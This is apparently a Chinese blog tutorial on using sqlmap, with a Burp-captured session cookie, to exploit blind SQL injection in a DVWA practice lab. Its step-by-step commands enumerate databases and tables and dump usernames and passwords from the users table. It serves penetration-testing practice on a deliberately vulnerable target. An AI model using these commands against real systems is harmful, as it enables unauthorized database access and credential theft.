DVWA—使用sqlmap工具get注入


环境工具

使用phpstudy搭建的DVWA靶场SQL盲注
burpsuite
sqlmap


一、下载安装sqlmap

下载安装sqlmap https://javaforall.cn/126449.html

二、攻击步骤

1.修改靶场级别

修改DVWA靶场的安全级别为Low

2.获取cookie

  • 合法输入2,页面正常回显
    在这里插入图片描述
  • 由于需要cookie值,使用burpsuite进行抓包获取cookie
    在这里插入图片描述

3.寻找注入点

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch

在这里插入图片描述
在这里插入图片描述

4.查看数据库信息

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch --dbs

在这里插入图片描述
在这里插入图片描述

5.查看当前数据库名称

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch --current-db

在这里插入图片描述

6.查看数据库中所有的表

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa --tables

在这里插入图片描述

7.查看users表中的字段

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa -T users --columns

在这里插入图片描述
在这里插入图片描述

8.爆破users表中特殊字段的信息

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa -T users -C “user,password” --dump

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


总结

本章介绍了sqlmap关于get注入的使用步骤以及攻击的相关语句。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值